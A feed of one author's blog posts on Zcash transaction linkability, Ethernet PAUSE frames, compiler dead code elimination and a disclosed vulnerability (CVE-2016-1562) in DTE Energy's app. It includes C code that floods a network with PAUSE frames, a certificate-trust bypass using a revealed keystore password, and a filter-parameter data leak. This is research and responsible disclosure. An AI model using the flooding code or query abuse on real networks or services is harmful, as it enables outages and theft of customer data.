The use of z-addrs is optional. Transparent addresses, or “t-addrs”, are essentially equivalent to Bitcoin transactions. Coins can be sent between z-addrs and t-addrs. However, when doing a mixed transaction (t→ z or z→ t) the amount of the transaction is public, even while the corresponding z-addr is not. Zcash has noted that this introduces the potential for linkability.

To begin, I looked into exactly how prevalent the use of z-addrs really is. I found that only 19.6% of transactions involve any use of a z-addr. Furthermore,  98.1% of these transactions performed either a t → z transaction or a z → t transaction. The conclusion is that the use of true private transactions (z → z) is fairly rare.

Coins that are controlled by z-addrs are said to be in the “shielded pool”. I found that this pool is relative shallow; on average only 3.5% of the available coins are in the shielded pool.

The size of the shielded pool over time

With 19.6% of transactions making use of z-addrs, an average of only 3.5% of coins in the shielded pool suggests that coins that enter the pool are soon sent back to t-addrs. Since the amounts of these types of transactions are public, we can look for pairs of transactions (t → z and then z → t) where the same number of coins are sent to the pool and then back to a t-addr. I called these transactions round-trip transactions.

Improper use of z-addrs can lead to transaction linkability. From https://z.cash/blog/transaction-linkability.html

I searched the entire Zcash blockchain, looking for cases where t → z and z → t transactions had exactly the same number of coins transferred. To reduce false positives, I restricted the search to only those cases where the match was globally unique throughout the history of Zcash, e.g. if a t → z transaction was for 3.87514 ZEC, I looked if there was exactly one z → t transaction later on the blockchain for 3.87514 ZEC as well.

The motivation for this search was a suspicion that many people attempt to (for lack of a better word) launder their Zcash through the shielded pool. Since no exchanges or web wallets support z-addrs, users are forced to operate mainly through t-addrs if they want to use their coins. However, if they wish to obscure the source of these coins, they may pass them through the shielded pool. But, if they are not careful and make the amounts identical, the transaction may not be as private as they thought.

(Left) Stats on RTTs found (Right) Top 250 t → z transactions

I was able to find 10,075 round-trip transactions (as of block 196304). 96% of these were between transactions that appeared within two hours of each other on the blockchain. This is strong circumstantial evidence that the transactions are linked. The transactions themselves are available here.

The RTTs surprisingly accounted for 31.5% of all coins that ever entered the shielded pool. In fact, 236 of the top 250 t → z transactions (by amount) were involved in a RTT. After investigating the addresses involved it appears many Zcash mining pools are engaging in RTTs before distributing their miner rewards. The members of the mining pool may be under the impression that the source of their coins is private, but their privacy is contingent on the sender of the coins having the foresight to not perform a RTT.

  • ✇jeffq, published
  • nds4droid Privacy Policyjeffq
    nds4droid does not collect or transmit any personal or sensitive user data. The android.permission.RECORD_AUDIO permission is used only to emulate the microphone on the Nintendo DS, which some games use.
     
  • ✇jeffq, published
  • Obscure Ethernet for $200 please, Alex: The Ethernet PAUSE framejeffq
    This is a bizarre one. It all started when the internet seemed to go out at my house. My desktop, phone, TV, everything stopped working. The usual solution at a time like this is to power cycle the modem and router. While this fixed the situation temporarily, soon after the problem returned. What made me think this was more than just ISP flakiness was that for some reason Chrome actually locked up; good ol’ Windows “this program stopped responding” so like any enterprising engineer I busted open
     

Obscure Ethernet for $200 please, Alex: The Ethernet PAUSE frame

Od: jeffq
22. Srpen 2016 v 17:55

This is a bizarre one. It all started when the internet seemed to go out at my house. My desktop, phone, TV, everything stopped working. The usual solution at a time like this is to power cycle the modem and router. While this fixed the situation temporarily, soon after the problem returned. What made me think this was more than just ISP flakiness was that for some reason Chrome actually locked up; good ol’ Windows “this program stopped responding” so like any enterprising engineer I busted open Wireshark.

Some odd frames
Some odd frames

After some clever deductive reasoning, a.k.a randomly unplugging cables from the router, I determined that my TV was sending these mystery frames (yes, my TV — I have a Sony X805D Android TV). After power cycling the TV the problem went away but of course I wanted to figure out what was actually happening. You’d be forgiven if the above frames aren’t immediately recognizable — their definition is buried deep in Appendix 31B of the IEEE 802.3 Ethernet standard.

The type of an Ethernet frame is determined by it’s EtherType, which is a two byte identifier that comes after two six byte MAC addresses denoting source and destination. The mystery frame’s EtherType was 0x8808, which is for Ethernet flow control.

The very existence of Ethernet flow control may come as a shock, especially since protocols like TCP have explicit flow control mechanisms, presumably to compensate for Ethernet’s lack of one. However, on page 752 of the Ethernet spec we find a section dedicated to (rudimentary) flow control. The frame structure is fairly bare-bones: a two byte “opcode”, which in this case is 0x0001 for “PAUSE” and a two byte “pause_time”, denoting increments of 512 bit times (here’s a great diagram of the frame).

To test out the behavior of pause frames more thoroughly I wrote a simple libpcap (or WinPcap) program that transmits a PAUSE frame every ten milliseconds.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <pcap/pcap.h>

int main(int argc, char **argv)
{
    unsigned char PAUSE_FRAME[60] =
    {
        0x01, 0x80, 0xC2, 0x00, 0x00, 0x01, /* Destination MAC: Spanning tree for bridges   */
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* Source MAC:      Null                        */
        0x88, 0x08,                         /* EtherType:       MAC control                 */
        0x00, 0x01,                         /* OpCode:			Pause                       */
        0xFF, 0xFF,                         /* pause_time:		65535                       */
                                            /* 42 bytes of padding                          */
    };

    /* OMITTED: OPEN UP THE INTERFACE */

    memset(PAUSE_FRAME + 18, 0, 42); /* fill padding with 00 */

    while (1)
    {
        if (pcap_sendpacket(fp, PAUSE_FRAME, sizeof(PAUSE_FRAME)) != 0)
        {
            fprintf(stderr, "Error sending frame: %s\n", pcap_geterr(fp));
            break;
        }

        usleep(SLEEP_TIME_MS * 1000);
    }

    pcap_close(fp);
    return 0;
}

Sure enough, sending this frame repeatedly killed all traffic on my home network. (You can check out the full code on GitHub). What’s interesting is that this may have arisen from a bug in my home router (TP-Link AC750 Archer C2 running firmware 0.9.1.3.2). According to the Ethernet spec (31B.1)

The globally assigned 48-bit multicast address 01-80-C2-00-00-01 has been reserved for use in MAC Control PAUSE frames for inhibiting transmission of data frames from a DTE in a full duplex mode IEEE 802.3 LAN. IEEE 802.1D-conformant bridges will not forward frames sent to this multicast destination address, regardless of the state of the bridge’s ports, or whether or not the bridge implements the MAC Control sublayer.

It would appear that there is a clause that specifically attempts to deal with this scenario: nodes sending PAUSE message to the special multicast address 01:80:C2:00:00:01 are instructing the switch to not send them any more frames. My switch seems to honor this, but also forwards the frames to the other nodes on the network, in effect telling THEM to pause in sending frames, which would explain the observed behavior.

I did some digging — my router uses a MediaTek MT7620A router SoC which relies on a Realtek RTL8367RB to perform switch duties. Unfortunately I couldn’t find the data sheet for this specific chip, although the source code for the router is GPL, so the driver itself is perusable. A data sheet for the RTL8366 (a 6/9 port version of the chip) says on page 22:

Frames with group MAC address 01-80-c2-00-00-01 (802.3x Pause) and 01-80-c2-00-00-02 (802.3ad LCAP) will always be filtered. MAC address 01-80-c2-00-00-03 will always be forwarded. This function is controlled by pin strapping of EN_MLT_FWD (pin 32) upon power reset. After power on, the configuration may be changed by MLTID_ST[15:0][1:0] in Register MCPCR0-1 (0x000F – 0x0010).

Have we reached the end of the road? The above seems to suggest that the forwarding of PAUSE frames is controlled both by a pin and a register on the Ethernet switch chip. It would appear on my router this specific (standard conformant) feature was accidentally disabled, either by a floating pin or a zeroed out register leading to a “frame of death” that was forwarded by my switch, killing the network. It’s amazing what you find when you dig!

  • ✇jeffq, published
  • When code is suspiciously fast: adventures in dead code eliminationjeffq
    Part of a recent assignment for one of my classes involved calculating the Fibonacci sequence both recursively and iteratively and measuring the speed of each method. (BONUS: For a fun diversion, here is a paper I wrote about using the Golden Ratio, which is closely related to the Fibonacci sequence, as a base for a number system). In addition, we were supposed to pass the actual calculation as a function pointer argument to a method that measured the execution time. The task was fairly straight
     

When code is suspiciously fast: adventures in dead code elimination

Od: jeffq
5. Květen 2016 v 16:46

Part of a recent assignment for one of my classes involved calculating the Fibonacci sequence both recursively and iteratively and measuring the speed of each method. (BONUS: For a fun diversion, here is a paper I wrote about using the Golden Ratio, which is closely related to the Fibonacci sequence, as a base for a number system). In addition, we were supposed to pass the actual calculation as a function pointer argument to a method that measured the execution time.

The task was fairly straight forward, so I fired up Visual Studio 2015 and got to work. I usually target x64 during development (due to some misguided belief that the code will be faster), and when I ran the code in release mode I received the following output as the time needed to calculate the 42nd Fibonacci number:

Recursive: 0.977294758 seconds
Iterative: 0.000000310 seconds

Since calculating $F_{42}$ through naive recursion requires ~866 million function calls, this pretty much jived with my expectations. I was ready to submit the assignment and close up shop, but I decided it’d be safer to submit the executable as as 32-bit application. I switched over to x86 in Visual Studio, and for good measure ran the program again.

Recursive: 0.000000000 seconds
Iterative: 0.000000311 seconds

Well then. That was… suspiciously fast. For reference, here is (a stripped down version of) the code I was using.

#include <iostream>
#include <iomanip>
#include <chrono>
#include <cassert>

constexpr int MAX_FIB_NUM = 42;
constexpr int F_42 = 267914296;

int fib_recursive(int n)
{
	if (n < 2)
		return n;
	else
		return fib_recursive(n - 1) + fib_recursive(n - 2);
}

int fib_iterative(int n)
{
	int f_1 = 1, f_2 = 0;

	for (int i = 1; i < n; ++i)
	{
		int tmp = f_1;
		f_1 = f_1 + f_2;
		f_2 = tmp;
	}

	return f_1;
}

double measure_execution_time(int(*func)(int))
{
	auto start = std::chrono::high_resolution_clock::now();
	int ret = func(MAX_FIB_NUM);
	auto end = std::chrono::high_resolution_clock::now();

	assert(ret == F_42);

	return std::chrono::duration<double>(end - start).count(); //convert to fractional seconds
}

int main(int argc, char** argv)
{
	auto recursive_duration = measure_execution_time(fib_recursive);
	auto iterative_duration = measure_execution_time(fib_iterative);

	std::cout << std::setprecision(9) << std::fixed; //up to nanoseconds

	std::cout << "Recursive: \t" << recursive_duration << " seconds " << std::endl;
	std::cout << "Iterative: \t" << iterative_duration << " seconds " << std::endl;

 	return 0;
}

In debug mode the code took the expected amount of time; only the release build targeting x86 was exhibiting the seemingly blazingly fast performance. What was happening here? Some constexpr magic resulting in the compiler precomputing the answer? An overly aggressive reordering of the now() calls?

To figure out the answer I opened the executable in IDA and started poking around.

Start of main() on x86 generated by Visual Studio 2015
Start of main() on x86 generated by Visual Studio 2015

No wonder the code took almost no time — we’re simply measuring the time it takes to measure the lea instruction! The next section of code appeared to be the fib_iterative  function:

Inlined fib_iterative function
Inlined fib_iterative function

It would appear that a function pointer is no barrier to Visual Studio’s inlining; measure_execution_time  never explicitly appears as a discrete subroutine. Regardless, the inlined assembly fib_iterative  is about has straightforward as possible. Over on x64 the code appears even simpler (all code was compiled with /O2).

Start of main() on x64 generated by Visual Studio 2015
Start of main() on x64 generated by Visual Studio 2015

The function pointer inlining is gone, replaced with the more or less expected code, i.e. load the address of the function into an argument register and then call measure_execution_time .

So what’s the deal here? Where the heck did fib_recursive go on x86? I believe what we’re seeing is an unexpected application of dead code elimination. On Visual Studio the assert  macro is #define assert(expression) ((void)0)  in release mode, meaning the check that the return is equal to F_42  turns into nothing!

Since the return of fib_recursive (now) isn’t used, and the function itself simply does trivial math (besides calling itself), the compiler has decided it serves no purpose. What’s interesting is that the compiler did not make the same determination for fib_iterative . Given the choice between the two I would have assumed that fib_iterative , with its constant sized loop, would be easier to analyze than the recursive structure of fib_recursive . What’s even weirder is that this only happens on x86, not x64.

After modifying the code to display the the result of the functions with std::cout the problem went away. The moral of the story is that if you’re doing some performance unit testing make sure that your functions touch the outside world in some way; asserts aren’t always enough. Otherwise, the compiler may spontaneously decide to eliminate your code all together (and it may be platform dependent!), giving the illusion of incredible speed and cleverness on your part 🙂

CVE-2016-1562: Unauthenticated “filter” parameter leads to customer information leak in the DTE Energy Insight app

Od: jeffq
10. Březen 2016 v 04:26

BACKGROUND

Here in southeast Michigan nearly all of our electricity (and a good chunk of our natural gas) comes from DTE Energy, which serves 2.1 million people in the greater Metro Detroit area. DTE recently upgraded most of their electricity meters to ZigBee-enabled smart meters, and as part of this rollout they released the DTE Energy Insight app which allows customers to view their energy usage, set targets, and earn a host of achievements (no Steam cards sadly) when meeting different energy goals. In addition, at no charge DTE sends customers an “Energy Bridge”, a small device that connects to a home network and monitors the ZigBee messages generated by a smart meter to give real-time energy consumption information.

The DTE Energy Insight app and the Energy Bridge device

Given my curious nature I decided to poke around to discover how exactly the app and the Energy Bridge worked. This post is about a vulnerability in the app itself (although I’ve been tinkering with my Ettus Research B200 SDR to intercept the ZigBee messages as well).

METHODOLOGY

By rooting my phone and using ProxyDroid to forward all traffic to a mitmproxy proxy running on my PC I deduced that the Insight app was attempting to connect to apps.dteenergy.com via TLS (non-TLS connections were rejected). Even though I had the certificate authority that mitmproxy generates installed to the trust store on my phone the app refused to communicate through the TLS proxy, so naturally I suspected some form of certificate pinning or a custom trust store was being used by the app.

Decompiling the app’s APK with Apktool proved a somewhat frustrating experience; the app appeared to have been run through an obfuscator. The res/raw/ directory in the APK did provide hints, though; the app contained two .bks (BouncyCastle keystore) files. Unfortunately, the keystores were password protected. However, the resource IDs for these files gave me an anchor in the code, and I was able to follow the decompiled code to the function that loads the keystores through javax.net.ssl.TrustManagerFactory.

Decompilation of .bks loading procedure
Decompilation of .bks loading procedure

res/raw/dtecomodo.bks had resource ID 0x7f070009, and the decompilation clearly showed that the password “vectorform” was being used. This code existed in the com.vectorform.wattsonandroid.c.a class, which let me know that Vectorform developed the app for DTE.

dtecomodo.bks contents
dtecomodo.bks contents

The keystore itself contained a certificate chain for the AddTrust External CA Root as well as the Comodo High-Assurance Secure Server CA, an intermediate authority. So, the Insight app wasn’t specifically pinning to a certificate for the API endpoint, but it enforced that the certificate that apps.dteenergy.com presented must be issued by the specific AddTrust/Comodo chain given in the file. To bypass this restriction I added the mitmproxy root CA to the keystore and recompiled the app with Apktool.

Modified dtecomodo.bks file
Modified dtecomodo.bks file

The modified APK communicated through the mitmproxy — success!

mitmproxy capture of Insight app traffic

Every API endpoint required that an HTTP Basic Access Authentication header was provided that contained the DTE customer’s username and password (the same one they use to access their online billing). The IdentityService endpoint returned a dteSAML variable, which needed to be included in all requests to endpoints that queried the customer’s actual energy usage. Presumably this is a SAML token, which likely is passed along to backend DTE servers that actually monitor the customer’s usage. This led me to believe that data for the application is managed separately from the actual usage data. This was further confirmed by investigating the api/Customer endpoint which returned a DTEID that could be used in some requests; dteSAML was only needed when querying actual usage data.

Basic tests such as requesting information for a different DTEID via a GET to api/Customer showed that most endpoints were correctly checking access controls. Of interest was the api/Notification endpoint, which accepted a curious filter parameter. Un-URL-encoded, the parameter read as follows:

DTEID eq <dteid> and IsRead eq false and NotificationType.IsNotification eq true

This suggested that the filter parameter accepted arbitrary queries against a JSON-like database and returned the results. I wrote a script to request arbitrary filter parameters; the only authorization needed was the username and password for my DTE account passed as a Basic Access Authentication header.

VULNERABILITY

Sample result from a modified filter parameter
Sample result from a modified filter parameter

As suspected, the filter parameter was essentially a read-only SQL injection attack; the server would respond with whatever was asked of it. Thus, a filter of Customer.Zipcode eq 48346 would return the app’s database for every user with a 48346 ZIP code. In addition to api/Notification there were a number of other endpoints that also accepted a filter parameter, e.g. api/CustomerProject. This resulted in the compromise of the entire database.

CONCLUSION

Her daughter is named Help I'm trapped in a driver's license factory.
This xkcd needs no introduction

Classic SQL injection attacks rely on string manipulation to escape the value of a parameter and modify the behaviour of the underlying query. While not as serious as a full injection vulnerability (which would allow us to invoke the ghost of Bobby Tables), allowing an authenticated user to specify the full parameter to a WHERE-like clause is nearly as dangerous (especially if the table contains personal data on every user of your app!).

If I may editorialize, DTE Energy Insight is a pretty slick app. It’s clear that a lot effort was put into its user interface and design. Although this article doesn’t cover the Energy Bridge device, my tinkering with it has shown me that the engineers that worked on it were security contentious. The endpoints that deal with customer energy information require a SAML token, and those such as api/Customer don’t return information if a DTEID different than that of the logged in user is requested.

The filter parameter was likely a dirty hack — I’m sure there’s an engineer somewhere that cringed when they wrote it. Although the app is relatively obscure in the grand scheme of things the personal information of perhaps hundreds of thousands of users will always be a juicy enough target to warrant malicious activity. Techniques such as certificate pinning or custom trust chains protect against nefarious men-in-the-middle; they can’t guarantee the secrecy of an insecure API.

RESPONSIBLE DISCLOSURE
  • Jan 16, 2016: Vulnerability discovered
  • Jan 28, 2016: Private disclosure to [email protected] and [email protected]
  • Jan 29, 2016: Disclosure to CERT
  • Feb 3, 2016: CERT confirmed reception of report by DTE
  • Feb 29, 2016: CERT reported that DTE fixed the vulnerability
  • Feb 29, 2016: Fix confirmed
  • Mar 1, 2016: Public disclosure scheduled for Mar 3, 2016
  • Mar 2, 2016: DTE requested disclosure be pushed back to Mar 10, 2016
  • Mar 10, 2016: Public disclosure (VU#713312CVE-2016-1562)
  • ✇jeffq, published
  • nds4droid release 47jeffq
    2016 brings us an update for nds4droid! Nathaniel D. was nice enough to provide a new German translation. In addition I went ahead and converted the code to an Android Studio project and moved everything away from Sourceforge (15 years too late, amirite) and over to GitHub. The code can now be found there: https://github.com/jquesnelle/nds4droid. Go ahead and grab the latest APK or get it straight from Google Play.
     

nds4droid release 47

Od: jeffq
11. Únor 2016 v 21:48

2016 brings us an update for nds4droid! Nathaniel D. was nice enough to provide a new German translation. In addition I went ahead and converted the code to an Android Studio project and moved everything away from Sourceforge (15 years too late, amirite) and over to GitHub. The code can now be found there: https://github.com/jquesnelle/nds4droid.

Go ahead and grab the latest APK or get it straight from Google Play.

❌
❌